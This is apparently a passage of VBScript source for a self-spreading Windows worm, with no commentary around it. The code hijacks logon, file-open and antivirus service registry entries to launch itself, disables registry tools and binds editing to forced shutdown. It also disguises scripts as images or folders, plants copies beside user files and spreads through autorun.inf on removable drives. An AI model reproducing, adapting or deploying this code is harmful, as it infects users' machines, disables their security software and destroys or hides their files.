.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonUserinit", "C:WINDOWSsystem32userinit.exe, c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonshell", "explorer.exe, c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerBootExecute", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerEnvironmentComSpec", "%SystemRoot%system32cmd.exe, c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesPugPlayImagePath", "%SystemRoot%system32services.exe, c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBootAlternateShell", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicessrserviceImagePathservice", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNPFMntorImagePath", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNSCServiceImagePath", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSAVScanImagePath", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNPFMntorImagePath", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSNDSrvcImagePath", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSPBBCDrvImagePath", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSPBBCSvcImagePath", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMcDetect.exeImagePath", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMcShieldImagePath", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMcTskshd.exeImagePath", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcupdmgr.exeImagePath", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMSIServerImagePath", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootAlternateShell", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_LOCAL_MACHINESYSTEMControlSet001ServicessrserviceImagePathservice", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTregeditShellopenCommand", "c:windowssvchost.exe " & qi
.RegWrite "HKEY_CLASSES_ROOTregfileShellopencommand", "c:windowssvchost.exe " & qi
.RegWrite "HKEY_CLASSES_ROOTregfileShelleditcommand", "c:windowssvchost.exe " & qi
.RegWrite "HKEY_CLASSES_ROOTregeditShellopenCommand", "c:windowssvchost.exe " & qi
.RegWrite "HKEY_CLASSES_ROOTregfileShellopencommand", "c:windowssvchost.exe " & qi
.RegWrite "HKEY_CLASSES_ROOTregfileShelleditcommand", "c:windowssvchost.exe " & qi
.RegWrite "HKEY_CLASSES_ROOTVBEFile", "JPEG Image", "REG_EXPAND_SZ"
.RegWrite "HKEY_CLASSES_ROOTVBSFile", "File Folder", "REG_EXPAND_SZ"
.RegWrite "HKEY_CLASSES_ROOTexefile", "my_mimi", "REG_EXPAND_SZ"
.RegWrite "HKEY_CLASSES_ROOTVBEFileFriendlyTypeName", "JPEG Image", "REG_EXPAND_SZ"
.RegWrite "HKEY_CLASSES_ROOTVBSFileFriendlyTypeName", "File Folder", "REG_EXPAND_SZ"
.RegWrite "HKEY_CLASSES_ROOTtxtfileileFriendlyTypeName", "my_mimi documentation", "REG_EXPAND_SZ"
.RegWrite "HKEY_CLASSES_ROOTVBEFileDefaultIcon", dear.RegRead("HKEY_CLASSES_ROOTjpegfileDefaultIcon")
.RegWrite "HKEY_CLASSES_ROOTVBSFileDefaultIcon", dear.RegRead("HKEY_CLASSES_ROOTFolderDefaultIcon")
.RegWrite "HKEY_CLASSES_ROOTVBEFileShellEditCommand", "%systemroot%System32Shutdown.exe -s -f", "REG_EXPAND_SZ"
.RegWrite "HKEY_CLASSES_ROOTVBSFileShellEditCommand", "%systemroot%System32Shutdown.exe -s -f", "REG_EXPAND_SZ"
.RegWrite "HKEY_CLASSES_ROOTVBSFileShellOpenCommand", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTVBEFileShellOpenCommand", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTMsi.PackageshellOpen", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTMsi.PackageshellOpencommand", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTMsi.PackageshellRepaircommand", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTMsi.PatchshellOpencommand", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTbatfileshellopencommand", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTbatfileshelleditcommand", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTcomfileshellopencommand", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTcplfileshellcplopencommand", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTcplfileshellrunascommand", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTinffileshellInstall", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTinffileshellInstallcommand", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTinffileshellopencommand", "c:windowssvchost.exe " & heiji
.RegWrite "HKEY_CLASSES_ROOTtxtfileshellopencommand", "c:windowssvchost.exe " & heiji
.RegWrite "HKEY_CLASSES_ROOTtxtfileScriptEngine", "VBScript.Encode"
.RegWrite "HKEY_CLASSES_ROOTFolderShellScan For VirusesCommand", "c:windowssvchost.exe " & forest
.RegWrite "HKEY_CLASSES_ROOTFolderShellexplorecommandcommand", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTFolderShellopencommandcommand", "wscript.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTApplicationsnotepad.exeshelleditcommand", "%systemroot%System32Shutdown.exe -s -f", "REG_EXPAND_SZ"
.RegWrite "HKEY_CLASSES_ROOTApplicationsnotepad.exeshellopencommand", "c:windowssvchost.exe " & heiji
.RegWrite "HKEY_CLASSES_ROOTApplicationsnotepad.exeshelleditcommandcommand", "%systemroot%System32Shutdown.exe -s -f", "REG_EXPAND_SZ"
.RegWrite "HKEY_CLASSES_ROOTApplicationsnotepad.exeshellopencommandcommand", "c:windowssvchost.exe " & heiji
.RegWrite "HKEY_CLASSES_ROOTApplicationsWordpad.Document.1shellopencommand", "c:windowssvchost.exe " & heiji
.RegWrite "HKEY_CLASSES_ROOTApplicationsWordpad.Document.1shellopencommandcommand", "c:windowssvchost.exe " & heiji
.RegWrite "HKEY_CLASSES_ROOTApplicationsWordpad.exeshellopencommand", "c:windowssvchost.exe " & heiji
.RegWrite "HKEY_CLASSES_ROOTApplicationsWordpad.exeshellopencommandcommand", "c:windowssvchost.exe " & heiji
.RegWrite "HKEY_CLASSES_ROOTApplicationscedt.exeshellopencommand", "c:windowssvchost.exe " & mimi
.RegWrite "HKEY_CLASSES_ROOTApplicationscedt.exeshelleditcommand", "%systemroot%System32Shutdown.exe -s -f", "REG_EXPAND_SZ"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftRegEdt32SettingsReadOnly", 1, "REG_SZ"
.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftRegEdt32SettingsReadOnly", 1, "REG_SZ"
end with
End Sub
Sub dwozmc()
on error resume next
Dim love, dear, drive, drives, folder, files, file, nama, path, vir, subfolder, meteran, elo, cari
Set love = createobject(StrReverse("tcejbOmetsySelif.gnitpircS"))
set drive = love.GetLogicalDrives
For Each drive In drives
If drive.IsReady Then
cari drive & ""
DoEvents
End If
Next
dwozmc()
End Sub
Function cari()
on error resume next
Set love = createobject(StrReverse("tcejbOmetsySelif.gnitpircS"))
Set folder = love.GetFolder(path)
nama = folder.name
for each file in folder.files
set elo = love.getfile(File.path)
meteran = (elo.size)/1024
ext = love.GetExtensionName(File.Path)
ext = StrReverse(LCase(ext))
vir = love.getbasename(file.path)
if ext = "sbv" or ext = "ebv" or ext = "cod" or ext = "ftr" or ext = "fdp" or ext = "gpj" then
set broken = love.createtextfile(File.Path & ".vbe", 1)
broken.write lost
set friendship = love.getfile(File.Path & ".vbe")
friendship.Attributes = 33
if file.name = "cotox.vbs" or file.name = "kangen.exe" or file.name = "indra.com" or file.name = "MSOHEV.EXE" or file.name = "SVCH0ST.EXE" or file.name = "WINL0G0N.EXE" or file.name = "Surat_Buat_Presiden.zip" or file.name = "Surat_Buat_Presiden.exe" or file.name = "indra.exe" or file.name = "for_you.exe" or file.name = "indra.pif" or file.name = "hallo.exe" or file.name = "icute.vbs" or file.name = "frzstate.exe" or file.name = "I-Cute.vbs" or file.name = "Perfected_v5.vbe" or file.name = "animasi.exe" or file.name = "C.Stankal.com" then
love.DeleteFile(File.path)
DoEvents
End if
if file.name = "msvbvm60.dll" then
love.RenameFile(File.path & "my_mimi.dll")
DoEvents
End if
if vir = nama and ext = "exe" then
love.DeleteFile(File.path)
end if
DoEvents
For Each Subfolder In Folder.SubFolders
kejar Subfolder.Path
DoEvents
Next
End If
Next
End Function
sub ontrus()
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe desktop.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "desktop.vbs")
tf.attributes = 0
set tf=fs.createtextfile(winpath & "desktop.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "desktop.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf = fs.getfile(flashdrive.path &"desktop.vbs")
tf.attributes = 0
set tf = fs.createtextfile(flashdrive.path &"diary_mimi.vbe",2,true)
tf.write mysource
tf.close
set tf = fs.createtextfile(flashdrive.path &"desktop.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(flashdrive.path &"desktop.vbs")
tf.attributes = 39
set tf = fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes = 0
set tf = fs.createtextfile(flashdrive.path &"autorun.inf",2,true)
tf.write atr
tf.close
set tf = fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes = 39
on error resume next
set tf = fs.getfile("c:windowssystem32wscript.exe")
tf.Attributes = 39
set tf = fs.getfile("c:windowssvchost.exe")
tf.Attributes = 0
fs.copyfile "c:windowssystem32wscript.exe", "c:windowssvchost.exe"
set tf = fs.getfile("c:windowssvchost.exe")
tf.Attributes = 39
on error resume next
set tf = fs.getfile("c:windowsEXPL0RER.vbs")
tf.attributes = 0
set tf = fs.createtextfile("c:windowsEXPL0RER.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile("c:windowsEXPL0RER.vbs")
tf.attributes = 39
on error resume next
set tf = fs.getfile("c:windowssystemWinUpdt.vbs")
tf.attributes = 0
set tf = fs.createtextfile("c:windowssystemWinUpdt.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile("c:windowssystemWinUpdt.vbs")
tf.attributes = 39
tf.Close
set sd = createobject("Wscript.shell")
tachoor = "c:windowsEXPL0RER.vbs"
sd.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunKernell32", "c:windowssvchost.exe " & tachoor
end if
next
if check <> 1 then
Wscript.sleep 20000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname
end sub
---------------------------------------[akhir scrpt]--------------------